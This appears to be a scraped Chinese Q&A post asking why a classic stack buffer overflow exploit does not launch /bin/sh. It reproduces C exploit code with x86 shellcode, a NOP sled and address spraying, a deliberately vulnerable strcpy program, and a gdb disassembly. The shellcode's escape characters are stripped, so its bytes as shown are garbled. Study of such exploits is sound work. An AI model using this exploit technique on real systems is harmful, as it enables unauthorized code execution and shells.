linux bin sh c,linux - 我想使用CShell代码使缓冲区溢出并执行bin/sh_c_开发99编程知识库...

我试图使缓冲区溢出并运行shellcode以执行bin/sh

exploit3.c#include

#include

#include

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 512

#define NOP 0x90

char shellcode[] =

"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"

"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"

"x80xe8xdcxffxffxff/bin/sh";

unsigned long get_sp(void) {

__asm__("movl %esp,%eax");

}

void main(int argc, char *argv[]) {

char *buff, *ptr;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int i;

if (argc > 1)

bsize = atoi(argv[1]);

if (argc > 2)

offset = atoi(argv[2]);

if (!(buff = malloc(bsize))) {

printf("Can't allocate memory.n");

exit(0);

}

addr = get_sp() - offset;

printf("Using address: 0x%lxn", addr);

ptr = buff;

addr_ptr = (long *) ptr;

for (i = 0; i < bsize; i+=4)

*(addr_ptr++) = addr;

for (i = 0; i < bsize/2; i++)

buff[i] = NOP;

ptr = buff + ((bsize/2) - (strlen(shellcode)/2));

for (i = 0; i < strlen(shellcode); i++)

*(ptr++) = shellcode[i];

buff[bsize - 1] = '';

memcpy(buff,"EGG=",4);

putenv(buff); system("/bin/bash");

}

vulnerable.c#include

#include

int main(int argc, char *argv[])

{

char xbuff[512];

if(argc >1)

strcpy(xbuff, argv[1]);

return 0;

}

函数main的汇编代码(gdb) disass main

Dump of assembler code for function main:

0x0804840b : lea 0x4(%esp),%ecx

0x0804840f : and $0xfffffff0,%esp

0x08048412 : pushl -0x4(%ecx)

0x08048415 : push %ebp

0x08048416 : mov %esp,%ebp

0x08048418 : push %ecx

0x08048419 : sub $0x204,%esp

0x0804841f : mov %ecx,%eax

0x08048421 : cmpl $0x1,(%eax)

0x08048424 : jle 0x8048441

0x08048426 : mov 0x4(%eax),%eax

0x08048429 : add $0x4,%eax

0x0804842c : mov (%eax),%eax

0x0804842e : sub $0x8,%esp

0x08048431 : push %eax

0x08048432 : lea -0x208(%ebp),%eax

0x08048438 : push %eax

0x08048439 : call 0x80482e0

0x0804843e : add $0x10,%esp

0x08048441 : mov $0x0,%eax

0x08048446 : mov -0x4(%ebp),%ecx

0x08048449 : leave

0x0804844a : lea -0x4(%ecx),%esp

0x0804844d : ret

End of assembler dump.

程序被执行，但bin/sh没有被调用：[aleph1]$ ./exploit3 612

Using address: 0xbffffdb4

[aleph1]$ ./vulnerable $EGG

[aleph1]$

预期输出为：[aleph1]$ ./exploit3 612

Using address: 0xbffffdb4

[aleph1]$ ./vulnerable $EGG

$ exit

[aleph1]$

哪儿出错了?！

第二个问题：为什么main()的末尾运行system("/bin/bash")？